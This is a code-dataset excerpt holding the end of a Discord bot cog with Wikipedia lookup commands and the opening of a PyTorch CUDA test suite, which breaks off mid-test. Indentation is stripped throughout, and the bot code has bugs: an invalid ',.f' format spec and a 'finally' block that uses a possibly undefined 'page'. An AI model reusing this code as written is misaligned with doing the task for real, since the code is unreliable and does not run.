await ctx.send("it seems you didn't put anything in your search")
return
if ctx.message.channel.id == 693942287910305842:
try:
summary = wikipedia.summary(search)
page = wikipedia.page(search)
await ctx.send("```\n" + summary + "```")
except wikipedia.exceptions.DisambiguationError:
await ctx.send("wasn't able to find what you were looking for, try using `wiki_search` to list a few, and copy/paste it into here")
except wikipedia.exceptions.PageError:
await ctx.send("couldn't find the page you were looking for :pensive:")
except wikipedia.exceptions.RedirectError:
await ctx.send("RedirectError bro, try again..?")
except wikipedia.exceptions.WikipediaException:
await ctx.send("I got a weird exception that isn't recognizable by the code, ping wiki about his problem pls")
await ctx.send("unless you were missing an argument, then don't ping him")
finally:
await ctx.send(page.url)
else:
await ctx.send("you must go to <#693942287910305842> to use this command")
return
@wiki_summary.error
async def wiki_summary_error(self, ctx, error):
if isinstance(error, CommandOnCooldown):
await ctx.send(f"{ctx.message.author.mention} sorry but you're on cooldown for {error.retry_after:,.f} seconds")
return
@cooldown(1, 10, BucketType.user)
@commands.command()
@guild_only()
async def wiki_page(self, ctx, *, search=""):
if search == "" or search == " ":
await ctx.send("it seems you didn't put anything in your search")
return
if ctx.message.channel.id == 693942287910305842:
try:
page = wikipedia.page(search)
await ctx.send("```\n" + page.content + "\n```")
except wikipedia.exceptions.DisambiguationError:
await ctx.send("wasn't able to find what you were looking for, try using `wiki_search` to list a few, and copy/past it into here")
except wikipedia.exceptions.PageError:
await ctx.send("couldn't find the page you were looking for :pensive:")
except wikipedia.exceptions.RedirectError:
await ctx.send("RedirectError bro, try again..?")
except wikipedia.exceptions.WikipediaException:
await ctx.send("I got a weird exception that isn't recognizable by the code, ping wiki about his problem pls")
finally:
await ctx.send(page.url)
else:
await ctx.send("sorry but you can only use this command in <#693942287910305842> ")
return
@wiki_page.error
async def wiki_page_error(self, ctx, error):
if isinstance(error, CommandOnCooldown):
await ctx.send(f"sorry but you're on cooldown {ctx.message.author.mention} for {error.retry_after:,.f} seconds")
return
def setup(client):
client.add_cog(Wikipedia(client))
|
py | 7df9f637274cb3b5f801445a7a5915ed3e9209b7 | # Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
# Test the case where the pinned data_ptr is not equal to the storage data_ptr.
x_base = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
x = x_base[1:]
self.assertTrue(x.is_pinned())
self.assertTrue(x_base.is_pinned())
self.assertNotEqual(x_base.data_ptr(), x.data_ptr())
self.assertEqual(x_base.storage().data_ptr(), x.storage().data_ptr())
y = torch.ones(10000000 - 1, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cublas_allow_fp16_reduced_precision_reduction_get_set(self):
orig = torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = not orig
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), not orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
